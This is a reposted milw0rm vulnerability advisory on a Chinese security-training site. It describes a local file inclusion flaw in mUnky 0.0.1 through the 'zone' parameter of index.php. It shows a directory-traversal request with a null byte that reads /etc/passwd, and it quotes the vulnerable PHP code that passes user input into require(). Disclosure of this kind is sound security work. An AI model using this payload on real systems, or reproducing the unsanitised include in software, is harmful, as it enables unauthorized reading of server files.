首页 实地培训 VIP专区 文章中心 下载中心 精品动画 安全服务 安全产品 企业文化
技术论坛
 -->开创网络首先基于以学员为中心的人性化教学方式。以案例式教学、互动式教学为主线。
 
  当前位置: 首页 > 文章中心 > 漏洞公告 >
 
 
本地文件共享漏洞
发布者ID:3 作者: 发布时间:2008-06-27 01:51:27 来源: 点击:
 

mUnky 0.0.1 (index.php zone) Local File Inclusion Vulnerability
 
作者:milw0rm 文章来源:milw0rm 点击数: 更新时间:2008-6-27
 
 
[*]================================================================================[*]
|             _____ _     _         _   _____                                      |
|            |_   _| |__ (_)_ __ __| | | ____|   _  ___                            |
|              | | | '_ \| | '__/ _` | |  _|| | | |/ _ \                           |
|              | | | | | | | | | (_| | | |__| |_| |  __/                           |
|              |_| |_| |_|_|_|  \__,_| |_____\__, |\___|                           |
|                                            |___/                                 |
|              ____                       _ _                                      |
|             / ___|  ___  ___ _   _ _ __(_) |_ _   _                              |
|             \___ \ / _ \/ __| | | | '__| | __| | | |                             |
|              ___) |  __/ (__| |_| | |  | | |_| |_| |                             |
|             |____/ \___|\___|\__,_|_|  |_|\__|\__, |                             |
|                                               |___/                              |
[*]================================================================================[*]
|  Author: StAkeR ~ StAkeR@hotmail.it                                              |
[*]================================================================================[*]
|  mUnky 0.0.1 <= Local File Inclusion Vulnerability                               |
[*]================================================================================[*]
|  Get => http://dfn.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz |
[*]================================================================================[*]
|   index.php?zone=../../../../../../../../../etc/passwd%00                        |
[*]================================================================================[*]
|                                                                                  |
| //Check if zone is set                                                           |
|  if(!isset($_GET['zone']))                                                       |
|   {                                                                              |
|       $zone = "home";                                                            |
|   }                                                                              |
|   else{                                                                          |      
|       $zone = $_GET['zone'];                                                     |
|}                                                                                 |
| //Check for the desired page                                                     |
| if(file_exists("zone/$zone.php"))                                                |
| {                                                                                |
|      require("zone/$zone.php");                                                  |
| }                                                                                |
[*]================================================================================[*]

# milw0rm.com 



 
 
 
 
   
 
   
     
  • 课堂实景
  • 课程体系
  • 培训课程
  • 学费介绍
  • 巧用mstsc命令登录到console的方法
  • 课程介绍
  • 团队介绍
  • Linkideo免费Vpn
  • 就业前景
  • 汇款方式
  •  
     
     
    无标题文档
    一流开创网一流开创网一流开创网一流开创网一流开创网一流开创网一流开创网
      关于我们 | 联系方法 | 招聘信息 | 加入会员 | 诚征代理 | 广告服务 | 欢迎投稿 | 友情链接  
      版权所有:吉林省开创科技信息有限公司  
      服务热线:0431-84714442
    Copyright 2001 - 2007 All Rights Reserved